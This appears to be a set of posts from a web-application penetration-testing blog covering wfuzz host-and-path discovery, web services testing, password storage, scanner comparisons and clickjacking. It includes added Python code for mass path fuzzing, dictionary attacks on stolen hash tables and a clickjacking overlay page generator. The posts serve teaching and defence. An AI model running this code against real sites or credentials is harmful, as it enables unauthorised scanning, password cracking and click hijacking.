
Massive Web Application discovery with Wfuzz

Last week I had to review about 40 websites for a penetration test in a short period of time, so the first thing I wanted was to search for directories or files on the web servers. How can the full scan be automated with Wfuzz? We can use a command like this:

$ wfuzz -c -z file -f urllist.txt,dictionary.txt --html --hc 404 http://FUZZ/FUZ2Z 2> results.html

The first FUZZ will be replaced with the content of urllist.txt, where you should have the website addresses in the format "www.target.com", and the second FUZ2Z will be replaced with the dictionary; in my case I used big.txt.
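The same host-list × wordlist sweep in plain Python, as an added example that is not part of the original post and not wfuzz code. Everything that hits the network goes through an injectable fetch function, so the logic runs offline; the host names, the wordlist and the canned responses at the bottom are constructed. It also adds the check a practitioner wants before trusting "--hc 404" results: a host that answers a random path with 200 would turn every word in the dictionary into a false positive, so such hosts are reported and skipped.

```python
"""Cross-host discovery: every host in a list times every word in a
dictionary, keeping only paths whose status is not hidden, which is what the
wfuzz command above does with FUZZ/FUZ2Z and --hc 404.

Added example, not part of the original post and not wfuzz code. The fetch
function is injectable so the logic runs offline; the host list, wordlist and
the canned responses at the bottom are constructed for the demonstration.
"""
import random
import string
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

Fetch = Callable[[str], Optional[int]]


def http_status(url: str, timeout: float = 5.0) -> Optional[int]:
    """Live fetcher: the HTTP status for url, or None if the host did not answer."""
    req = urllib.request.Request(url, headers={"User-Agent": "discovery-example"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code                 # 403, 404, 500 ... are still answers
    except (urllib.error.URLError, OSError):
        return None                     # DNS failure, timeout, refused


def random_path(length: int = 12) -> str:
    """A path that should not exist, used to detect catch-all servers."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def discover(hosts, words, fetch: Fetch = http_status, hide=frozenset({404})):
    """Return (hits, catch_all).

    hits      -- {host: [(path, status), ...]} for statuses not in `hide`
    catch_all -- [(host, status)] for hosts that answer a random path with a
                 non-hidden status; every "hit" there would be a false
                 positive, so they are skipped and reported instead.
    """
    hits: Dict[str, List[Tuple[str, int]]] = {}
    catch_all: List[Tuple[str, int]] = []
    for host in hosts:
        base = f"http://{host}/"
        baseline = fetch(base + random_path())
        if baseline is None:
            continue                    # host unreachable, nothing to fuzz
        if baseline not in hide:
            catch_all.append((host, baseline))
            continue
        found = []
        for word in words:
            status = fetch(base + word)
            if status is not None and status not in hide:
                found.append((word, status))
        hits[host] = found
    return hits, catch_all


# --- constructed stand-ins for the real targets and their responses --------
SAMPLE_HOSTS = ["www.example-a.test", "www.example-b.test"]
SAMPLE_WORDS = ["admin", "backup", "test", "old"]
FAKE_SITES = {
    "www.example-a.test": {"admin": 200, "backup": 403},   # 404 otherwise
    "www.example-b.test": None,                            # 200 to everything
}


def fake_fetch(url: str) -> Optional[int]:
    """Offline fetcher answering from FAKE_SITES instead of the network."""
    host, _, path = url[len("http://"):].partition("/")
    site = FAKE_SITES.get(host)
    return 200 if site is None else site.get(path, 404)


if __name__ == "__main__":
    found, noisy = discover(SAMPLE_HOSTS, SAMPLE_WORDS, fetch=fake_fetch)
    for host, paths in found.items():
        for path, status in paths:
            print(f"{status}  http://{host}/{path}")
    for host, status in noisy:
        print(f"skipped {host}: answers {status} to random paths")
```

Run it as is to see the constructed results, or call discover(hosts, words) with the default fetcher against your own list. With 40 hosts and a wordlist the size of big.txt this is many thousands of requests, so a thread pool per host and a per-host delay are the next things to add; the catch-all baseline is the part that saves the most time in practice.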

Soon I will release an update of Webslayer, and will show how to do this with it.

Enjoy!

Laramies

Web Services Security testing

Last week I had to perform a penetration test on a Web Services environment, and during the project I found the following interesting documents:

SIFT  - Web Services Security Testing Framework  V1  - by SIFT  Link

This document is a great resource.

Web Services Security - by Bilal Siddiqui Link

Exploring Web Services Encryption - by Bilal Siddiqui Link

More on Web Services Encryption - by Schmoil Link

Seguridad en Servicios Web (Spanish) - by Oscar Gonzales Link

About the tools, I had some trouble with the usual hacking tools: we didn't have UDDI or jUDDI, so we had to hack the application server (JBoss) and then access the Web Services admin panel to get the WSDL.

With the WSDL I proceeded to perform some brute-force attacks with WebSlayer to find a valid username and password for WS-Security (client authentication).

The other tool I used was AppScan Web Services Power Tools, which allowed me to get the descriptions and perform requests, but I didn't like the way it handles the raw request...

Another interesting tool is soapUI, the web services testing tool; it's very complete and I'm still learning how to use it....

We also used WSFuzzer from OWASP. Here is a video on how to use it:

UPDATE:


Any other interesting tools or documents?

-CMM

Protecting users from password theft

A very good article from Chris Eng (Veracode) about how developers can design a strong password scheme in their applications to protect users from password theft.

Suppose that your database is stolen (hopefully not): is the data protected? Could the thieves easily reverse the passwords? In my last pentests the passwords were stored in clear text..... so it's common practice to have passwords stored in an insecure way, or even in clear text.

Here is a good practice for your developers or customers:

Veracode - How to protect your users from password theft
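As an added example (not code from the Veracode article or from the original post), the two schemes found in those pentests beside the one developers should use: a per-user random salt, an iterated hash and a constant-time comparison. The iteration count and salt length are values chosen here, not figures the article prescribes; the users and wordlist are constructed.

```python
"""Password storage: the cleartext and unsalted-hash schemes found in the
pentests, beside a salted, iterated hash with constant-time verification.

Added example; not code from the Veracode article or the original post.
ITERATIONS and SALT_BYTES are values chosen here, not figures the article
prescribes; tune the iteration count so one verification costs ~100 ms on
your servers.
"""
import hashlib
import hmac
import os

ITERATIONS = 200_000   # assumption, see above
SALT_BYTES = 16
SCHEME = "pbkdf2_sha256"


def store_cleartext(password: str) -> str:
    """What the pentests found: the stolen table *is* the password list."""
    return password


def store_unsalted_md5(password: str) -> str:
    """Hashed but unsalted: identical passwords give identical records, and one
    precomputed table cracks the whole dump at once."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def store_pbkdf2(password: str, salt: bytes = None, iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>'. A fresh
    random salt per user makes every record unique and kills precomputation;
    the iteration count makes every guess expensive."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{SCHEME}${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, record: str) -> bool:
    """Recompute with the stored salt and iterations, then compare in constant
    time so a timing side channel cannot leak how many bytes matched."""
    try:
        scheme, iterations, salt_hex, hash_hex = record.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(hash_hex)
        rounds = int(iterations)
    except ValueError:
        return False                       # malformed record, never a match
    if scheme != SCHEME:
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(dk, expected)


def dictionary_attack(records, wordlist, hash_fn):
    """Thief's view of a stolen table of unsalted hashes: hash each guess once
    and look it up against every record at the same time."""
    table = {hash_fn(w): w for w in wordlist}
    return {rec: table[rec] for rec in records if rec in table}


def dictionary_attack_salted(records, wordlist):
    """Same attack against salted records: every guess must be recomputed per
    record, paying the full iteration cost each time."""
    recovered = {}
    for rec in records:
        for w in wordlist:
            if verify_pbkdf2(w, rec):
                recovered[rec] = w
                break
    return recovered


if __name__ == "__main__":
    # Constructed users; two of them share a password.
    users = {"alice": "Summer2008", "bob": "Summer2008", "carol": "x7!Qr#2pLm"}
    wordlist = ["password", "Summer2008", "welcome1"]
    md5_table = [store_unsalted_md5(p) for p in users.values()]
    pbkdf_table = [store_pbkdf2(p, iterations=1000) for p in users.values()]  # low count for demo speed
    print("unsalted md5, shared password visible:", md5_table[0] == md5_table[1])
    print("cracked md5 :", dictionary_attack(md5_table, wordlist, store_unsalted_md5))
    print("cracked pbkdf:", dictionary_attack_salted(pbkdf_table, wordlist))
```

Both attacks recover "Summer2008" here because the password is in the wordlist; the difference is cost. Against the MD5 table the thief hashes the wordlist once and reads off every user who chose it, including the fact that alice and bob share it. Against the salted records each guess is recomputed per user at the full iteration count, so the same wordlist takes a factor of users × iterations longer and reveals nothing about who shares a password.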

-CMM

Web Application vulnerability scanners comparison

Today I saw a message from "Anantasec" on the "pen-test" mailing list about an evaluation/comparison of Web Application scanners.

The products analyzed are IBM AppScan (7.7.620 SP2), HP WebInspect (7.7.869) and Acunetix (6.0), all commercial products.

The analysis only evaluates the results of the scans against 16 applications; it doesn't compare features, options or capabilities of the products.

After reading the report I have some doubts about its origin. Could it be an analysis biased in favour of Acunetix? An anonymous writer, a blog with just one post... it makes me wonder. (Damn, no interesting metadata in the document.)

Personally I have used all the scanners and I'm happy with AppScan; I miss the scheduling option of WebInspect. Also Acunetix improved a lot in the latest versions, and could be an interesting option when considering price/value.

An interesting fact of the analysis is that each of the scanners performed better when scanning the demo application of its own company :)

Here is the report from Anantasec; draw your own conclusions.

Remember to use more than one tool for the task, to get complementary results, and also that a scanner will not discover all the vulnerabilities in the application, so don't rely on them alone.

I always use ProxyStrike when doing the manual analysis of the application, and I discover XSS and SQL injection that none of the scanners mentioned before does. Btw, a new version is coming!

If you want more options for Web application scanners don't forget the Open Source ones; right now there is a clear leader in this field, w3af. It's very complete, has even more plugins or checks than the commercial ones, and is multi-platform.

What are you using?

-CMM

Top 25 Most dangerous coding errors

A joint effort between CWE (Common Weakness Enumeration) and SANS, with the participation of experts in the field, produced the "Top 25 Most Dangerous Programming Errors", a list of the most significant programming errors that can lead to serious software vulnerabilities. This document will have an impact in many areas:

  • Software buyers will be able to buy much safer software (with a certificate that the code is free of these 25 bugs).
  • Programmers will have tools that consistently measure the security of the software they are writing.
  • Colleges will be able to teach secure coding more confidently.
  • Employers will be able to ensure they have programmers who can write more secure code.
"The main goal of the Top 25 list is to stop vulnerabilities at the source by educating programmers on how to eliminate all-too-common mistakes before software is even shipped."

This is a good initiative: a very brief list of programming errors that programmers can use as a guide. The language and examples used are very easy to understand, and I guess this will facilitate adoption by programmers.

There is a lot of information about secure coding at OWASP, but I guess this simple guide will be easier to use than the OWASP documentation.

Hope programmers start to use it :)

You can check the list here

-CMM



OWASP Testing Guide v3.0

The new testing guide was released on the 18th of December. This is a great project, and very useful for penetration testers. This version is very complete and cleaner than the previous versions.

You can download here:


-CMM

Jsky - a free Web Application Scanner

A new free Web application scanner is out, from the same author as Pangolin (a good SQL Injection tool). The scanner looks pretty solid and complete for an alpha version; the list of checks is the following:

  • SQL Injection
  • XSS
  • Insecure object usage
  • Local path disclosure
  • Insecure directory permissions
  • Server vulnerabilities like buffer overflows and configuration errors
  • Possible sensitive directories and files scan
  • Backup files scan
  • Source code disclosure
  • Command execution
  • File inclusion
  • Web backdoor
  • Sensitive information
  • And so much more......
It also claims to exploit the vulnerabilities, but I haven't tried that option yet.

Here is a screenshot of the tool in action:




You can download it from here

-CMM

Clickjacking Demo

A lot of buzz has been flowing around the net in the last few months about a new type of vulnerability known as "Clickjacking" or "UI redressing". The vulnerability is a variant of Cross-Site Request Forgery (CSRF): the victim's own click is turned into a request the attacker chose. The idea is simple; here is an explanation found on www.webmonkey.com:

"The basic idea is that an attacker loads the content of an external site into the site you’re visiting, sets the external content to be invisible and then overlays the page you’re looking at. When you click a link you see on the current page, you are in fact clicking on the externally loaded page and about to load pretty much whatever the attacker wants."

Well, it seems pretty easy and clear, but if you want to see an attack in action, check this demo at GUYA.NET, where an attacker takes control of the victim's camera through a Clickjacking attack.

Some of you might be wondering how you can protect against it. The latest version of NoScript (a Firefox plugin that provides protection against XSS) adds protection against Clickjacking.
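The overlay described in the quote, as an added example that is not code from the original post, the GUYA.NET demo or NoScript: a generator for the attacker page, plus the response-header check a tester runs before building one. The target URL, button coordinates and headers are constructed. The check covers X-Frame-Options and CSP frame-ancestors, which are the server-side defences (the post names NoScript, a client-side one); CSP source matching here is exact-origin only, a simplification.

```python
"""Clickjacking: the overlay page described above, plus the response-header
check a tester does before building one.

Added example; not code from the original post, the GUYA.NET demo or NoScript.
The target URL, button coordinates and headers are constructed. The check
covers X-Frame-Options and CSP frame-ancestors, the server-side defences;
CSP source matching is exact-origin only, a simplification of the spec.
"""
import html


def build_poc(target_url: str, button_x: int, button_y: int,
              width: int = 1200, height: int = 900) -> str:
    """Attacker page: a decoy button drawn where the target's sensitive button
    sits inside a transparent, full-size iframe stacked on top of it. The
    victim sees the decoy; the click lands on the framed target."""
    t = html.escape(target_url, quote=True)
    return f"""<!doctype html>
<html><body>
<p>You won! Click to claim your prize.</p>
<button style="position:absolute; left:{button_x}px; top:{button_y}px;">CLAIM</button>
<iframe src="{t}" scrolling="no"
        style="position:absolute; left:0; top:0; width:{width}px; height:{height}px;
               opacity:0; z-index:10; border:0;"></iframe>
</body></html>
"""


def is_framable(headers: dict, attacker_origin: str) -> bool:
    """True if a page served with these headers can be framed from
    attacker_origin. CSP frame-ancestors wins over X-Frame-Options when both
    are present; no header at all means the page is framable."""
    h = {k.lower(): v for k, v in headers.items()}

    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            if "none" in sources:
                return False
            if "*" in sources:
                return True
            # 'self' never matches a foreign origin; otherwise exact match only
            return attacker_origin.lower() in sources

    xfo = h.get("x-frame-options", "").strip()
    if not xfo:
        return True
    value = xfo.upper()
    if value in ("DENY", "SAMEORIGIN"):
        return False
    if value.startswith("ALLOW-FROM"):
        allowed = xfo.split(None, 1)[1].rstrip("/") if " " in xfo else ""
        return allowed.lower() == attacker_origin.lower()
    return True   # unrecognised value: browsers ignore the header


# Constructed target and response headers (no framing protection at all).
TARGET = "http://target.test/account/settings"
SAMPLE_HEADERS = {"Content-Type": "text/html; charset=utf-8"}

if __name__ == "__main__":
    if is_framable(SAMPLE_HEADERS, "http://evil.test"):
        print(build_poc(TARGET, button_x=420, button_y=310))
    else:
        print("target refuses to be framed from evil.test")
```

The coordinates are the whole trick: button_x/button_y are where the sensitive control appears once the target loads in a frame at (0,0), so the decoy is drawn there and the invisible frame absorbs the click. A page that sends X-Frame-Options: DENY or a frame-ancestors policy never renders inside that iframe, which is why is_framable is the first thing to check; NoScript's protection is the same idea enforced on the client side.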

Be careful where you click ;)

-CMM

EnDe - Complete web Encoder Decoder

In a web application analysis you always end up looking for a fast way to convert/encode/decode/transform a string or a piece of text. There are a lot of online encoders/decoders, but they are very specific; if you want a one-stop shop with everything you might need, enter EnDe.

I came across EnDe on the OWASP Project page, where it is described as:

"Encoder, Decoder, Converter, Transformer, Calculator, for various codings used in the wild wide web"

That's for sure: it has an extensive list of encoders, decoders, hashes and encryption; you can also transform dates and create regexps in different languages.

You can check EnDe on the OWASP page or on the tool's website

Enjoy

OWASP Spain Chapter Meeting

On the 21st of November I will be participating as a speaker at the OWASP Spain Chapter Meeting. I will give a talk about Information Gathering; the key point of the presentation is to show new techniques for gathering interesting information about a target (individual or company) and how you can use it in a penetration test. I will talk about my tools and about some online sites that provide interesting information.

If you want to join us, remember the 21st of November; place: IL3 - Institute for LifeLong Learning (Universitat de Barcelona)
Link: OWASP

PCI Requirement 666, sorry 6.6

After all the discussion around PCI DSS requirement 6.6, on what the real requirements were, we can conclude that from June 30 (2008) there are two options for the web application requirement:

1- Application code review, which is subdivided into the following alternatives:

  • Manual review of application source code
  • Proper use of automated source code analyzer (scanning) tools
  • Manual web application security vulnerability assessments
  • Proper use of automated web application security vulnerability assessment (scanning)  tools.
2- Web application Firewall

I think we should have both options implemented; they are not exclusive, and implementing just the manual web application assessment as the code review would not assure the security of the application, because some time may pass between the discovery of the vulnerabilities and the patching/correcting/solving phase, during which the application will be exposed; also, new vulnerabilities introduced after the manual web application assessment will put the security of the application in jeopardy.

Another interesting point is alternative 4 of option 1, "Proper use of automated web application security vulnerability assessment tools": what is considered "proper"? I imagine a lot of "tool monkeys" launching automatic scanners, printing the tool report and justifying requirement 6.6 for two pennies, and then you will have to explain to your customer why your service is more expensive than the other one....

It's always the same :(

More to come on this issue,

RedIris Conference



Hi all, on Thursday the 27th I will be talking at the "VI Foro de Seguridad RedIris"; the topic of this forum will be Web Application security. My talk is about "Common application security vulnerabilities", aka "The Usual Suspects". I will give an overview of the most common vulnerabilities, based on the OWASP Top 10.

If you want to have a good time and learn more about Web Application Security, this could be a good opportunity.

The conference program can be checked here

See you there!

Ajax security



Are you interested in learning about Ajax security? I was, so I got the book "Ajax Security" by Hoffman and Sullivan (2007, Addison-Wesley, 470 pages), and it is really useful. The book is well organized, the explanations are very clear and the examples well chosen.

I learned a lot about Ajax and the security implications of this technology from this book; I highly recommend it.


Ajax Security, Addison Wesley

Check the content table